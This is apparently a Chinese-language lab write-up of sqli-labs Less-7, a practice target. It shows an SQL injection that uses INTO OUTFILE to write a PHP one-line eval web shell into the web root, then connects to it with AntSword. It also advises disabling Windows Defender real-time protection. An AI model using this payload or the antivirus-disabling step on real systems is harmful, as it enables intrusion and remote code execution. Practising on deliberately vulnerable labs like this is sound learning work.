sqli-labs less-7 一句话木马

(纯小白,有建议欢迎提出)

 

一.判断注入点

很容易得出 ?id=1'))--+

二.写马

用到文件写入操作,需要开启mysql中的文件写入:

打开这个文件

\phpstudy_pro\Extensions\MySQL5.7.26\my.ini

加上这句代码(修改完成后记得重启mysql才能生效 )

 secure_file_priv 用来限制导出效果,有三个属性
null限制不能导出
为空可以自定义
为一个路径则只能导出到指定路径

先使用order by 判断出字段数为3

然后构造payload:

?id=1')) UNION SELECT 1,2,'<?php @eval($_REQUEST["password"])?>' into outfile'Z:\\phpstudy_pro\\WWW\\sqli-labs-master\\Less-7\\1.php'--+

?id=1')) UNION SELECT 1,2,'<?php @eval($_REQUEST["password"])?>' into outfile'Z:\\phpstudy_pro\\WWW\\sqli-labs-master\\Less-7\\1.php'--+

注意:要先在Windows 安全中心把实时保护给关了,要不然你传一个他给你删一个........

(手动关的话下次开机就会给你打开,很恶心,如果想永久关闭,可以试试这个一键关闭微软杀毒软件_Windows_Defender)

中国蚁剑直接连,成功

 

  • 2
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值